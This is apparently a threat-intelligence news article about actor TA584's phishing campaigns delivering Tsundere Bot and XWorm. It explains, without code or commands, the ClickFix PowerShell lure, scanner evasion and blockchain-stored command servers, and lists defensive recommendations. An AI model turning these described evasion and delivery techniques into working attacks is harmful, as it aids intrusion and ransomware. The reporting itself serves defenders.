Cybersecurity researchers have observed a major shift in how initial access brokers gain entry into corporate networks. A prolific threat actor tracked as TA584 has started using a new malware strain called Tsundere Bot, alongside the well-known XWorm remote access trojan, to establish access that can later lead to ransomware attacks.
According to Proofpoint researchers, this transition marks a significant evolution in the group’s attack strategy and operational scale, with campaign volume tripling and infrastructure rotating faster than in previous years. This rapid operational change makes traditional static detection far less effective.
TA584 Expands Its Attack Operations
Proofpoint has tracked TA584 since 2020, but the group significantly increased activity during late 2025. Campaign volume reportedly tripled compared to earlier quarters, while targeting expanded beyond North America and the UK to include Germany, other European countries, and Australia.
Instead of relying on predictable attack chains, TA584 now runs continuous campaigns that rotate infrastructure, payloads, and delivery methods rapidly. This approach reduces the effectiveness of signature-based detection and increases the likelihood of successful compromise.
See also: Ingram Micro Ransomware Attack Exposes Data of 42,000 People
Proofpoint notes that this constant campaign churn allows TA584 to evade filtering systems while maintaining a high infection rate.
How the New Attack Chain Works
The current infection flow begins with phishing emails sent from hundreds of compromised email accounts. Attackers frequently deliver these messages using cloud email platforms such as SendGrid and Amazon Simple Email Service (SES) to appear legitimate.
Each email contains a unique link that applies:
- Geofencing and IP filtering to avoid automated scanners
- Redirect chains using traffic distribution systems
- CAPTCHA verification to validate human interaction
Once the target passes these checks, a ClickFix page appears. The page instructs the victim to manually copy and run a PowerShell command. That command downloads and executes an obfuscated script, loads either XWorm or Tsundere Bot directly into memory, and redirects the browser to a harmless site to reduce suspicion.
This hands-on social engineering technique increases success rates because users unknowingly execute the malware themselves.
What Makes Tsundere Bot Dangerous
Tsundere Bot operates as a malware-as-a-service (MaaS) platform with both loader and backdoor capabilities. It depends on Node.js, which the malware automatically installs on infected systems.
Key capabilities include:
- Retrieving command-and-control (C2) addresses from the Ethereum blockchain using a technique similar to EtherHiding
- Communicating with C2 servers through WebSockets
- Profiling infected machines for hardware and operating system details
- Executing arbitrary JavaScript commands remotely
- Using infected systems as SOCKS proxy nodes
- Selling and renting bots through an integrated marketplace
The malware also checks system language settings and aborts execution on machines using CIS region languages, indicating deliberate geographic avoidance.
Researchers assess with high confidence that Tsundere Bot infections can enable ransomware deployment when used by TA584.
Kaspersky Confirms Blockchain Abuse in Tsundere Bot
Kaspersky researchers independently analyzed Tsundere Bot and confirmed that the malware abuses blockchain smart contracts to store and rotate C2 addresses. Early versions spread through malicious Node.js packages and fake installers disguised as popular software and games.
The botnet continues to expand and primarily targets Windows systems using MSI installers and PowerShell scripts. The malware installs persistence mechanisms through registry entries and process managers to maintain long-term access.
This blockchain-based infrastructure complicates takedown efforts because attackers can rotate command servers without modifying the malware binaries.
XWorm Remains a Secondary Payload
TA584 continues to deploy XWorm, a fileless remote access trojan that runs in memory and uses process hollowing to evade traditional endpoint detection. After execution, XWorm pulls additional modules from its command servers and establishes stealth persistence using obfuscated registry techniques.
While Tsundere Bot is gaining prominence, TA584 still rotates multiple malware families based on campaign objectives. Previously observed payloads include Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT, and XWorm, allowing the group to rapidly shift tooling when defenders disrupt a specific infection chain.
Proofpoint confirms that TA584 has consistently used XWorm since mid-2024 and continues pairing it with newer payloads to maintain operational flexibility.
What Security Teams Should Do Now
Researchers recommend several defensive actions to reduce exposure:
- Restrict unnecessary PowerShell execution in enterprise environments.
- Block or closely monitor node.exe execution from user-writable locations such as AppData.
- Monitor outbound connections to Ethereum RPC endpoints and suspicious WebSocket traffic used for command-and-control communication.
- Train employees to recognize social-engineering tactics such as fake CAPTCHA and ClickFix pages.
Early detection, behavioral monitoring, and user awareness remain critical against fast-moving threat actors like TA584.
TA584 shows no signs of slowing down. Researchers expect the actor to continue experimenting with new payloads and expanding geographic targeting as its infrastructure matures. As Tsundere Bot adoption expands across multiple threat groups, security teams should expect increased ransomware risk driven by blockchain-based command infrastructure and advanced fileless execution techniques.
